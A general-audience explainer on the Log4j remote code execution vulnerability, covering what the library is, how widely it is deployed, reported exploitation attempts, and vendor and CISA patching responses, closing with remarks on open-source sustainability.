Key Takeaways
A critical vulnerability was found in Log4j, a widespread logging software that is used all over the internet.
The vulnerability, which is hard to detect, allows hackers to execute code remotely on a company’s server.
Organizations are racing to identify vulnerable applications and fix them with the updated version of Log4j from Apache.
IMPORTANT: For the most up to date information about this vulnerability see CISA’s information page and Apache’s official page on the issue.
A bug in a widespread enterprise software called Log4j was discovered on December 9th and since then the cybersecurity world has kicked into overdrive. Companies are scrambling to identify vulnerable applications, detect potential attacks, and mitigate against exploits however possible. Nonetheless, serious hacks making use of the exploit are all but certain.
What is Log4j?
"Log4j" is a Java-based software that large organizations use to record user activity and the behavior of applications for subsequent review. Software developers use these activity logs for a variety of purposes, such as troubleshooting, auditing and data tracking. Distributed free by the nonprofit Apache Software Foundation, Log4j has been downloaded millions of times and is among the most widely used tools to collect information across corporate computer networks, websites and applications.
Log4j is one of the most popular logging libraries used online. Because it is both open-source and free, the library essentially touches every part of the internet. Even if you're a developer who doesn't use Log4j directly, you might still be running the vulnerable code because one of the open source libraries you use depends on Log4j.
What is the vulnerability?
The Log4j flaw, disclosed by Apache last week, allows attackers to execute code remotely on a target computer. This means that cybercriminals can use the vulnerability to install ransomware, hijack computers for large-scale assaults on internet infrastructure, or steal computing resources to mine cryptocurrency.
How big is this?
A list of affected software compiled by the Cybersecurity and Infrastructure Security Agency (CISA) — and restricted to only enterprise software platforms — runs to more than 500 items long. A list of all affected applications would undoubtedly run to many thousands more.
Companies such as Apple, IBM, Oracle, Cisco, Google and Amazon, all run the software; however, the most alarming issues have come with software that stays behind the scenes. Manufacturers that use the software include Broadcom, Red Hat, and VMware who all make software that enterprise clients build businesses on top of, effectively distributing the vulnerability at a core infrastructural level of many companies.
One cybersecurity firm reported that nearly half of corporate networks it was monitoring had seen attempts to exploit the vulnerability. "Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups," said cybersecurity company Check Point. More than 100 hacking attempts were occurring per minute when the vulnerability was announced.
Jen Easterly, head of CISA, called it "one of the most serious flaws" seen in her career. In a statement on Saturday, Easterly said "a growing set" of hackers are actively attempting to exploit the vulnerability.
Not only is the vulnerability widespread, it is also very difficult to manage. Experts are especially concerned about the vulnerability because hackers can gain easy access to a company's computer server, giving them entry into other parts of a network. It's also very hard to find the vulnerability or see if a system has already been compromised
The discovery of an easily exploitable bug found in a mostly enterprise-focused language is part of what analysts have called a “nearly perfect storm” around the Log4j vulnerability.
Sophisticated attackers will exploit the vulnerability, establish persistence then go dark. It may be a long time — years even — before effects are fully felt.
Industry response
The pressure is largely on companies to act. For now, people should make sure to update devices, software and apps when companies give prompts in the coming days and weeks. IBM, Oracle, AWS and Cloudflare have all issued advisories to customers, with some pushing security updates or outlining their plans for possible patches.
The Apache organization has released multiple updates in recent days and advised upgrading to the latest version of the Log4j tool. People who manage software within companies will be running through updates and mitigations as fast as they can.
Software updates for organizations like banks, hospitals, or government agencies are generally conducted on the scale of weeks and months, not days; In the meantime, fixes at the network layer have a key role to play: since malware programs communicate with their operators over the internet, measures that restrict incoming and outgoing web traffic can provide a stopgap to limit the effects of the exploit. For example adding new rules for a firewall to block HTTP requests containing strings characteristic of the Log4j attack code.
Closing thoughts
The panic and potential devastation of the Log4j vulnerability once again opens the discussion about how open-source software gets developed, paid for, and maintained. Should tech giants be giving more back to the communities of unpaid volunteers who build tools like Log4j? This problem is sometimes referred to as the open source sustainability problem. Once the world is done scrambling to patch this vulnerability, it will be primed for more conversations about making open source projects more sustainable for everyone.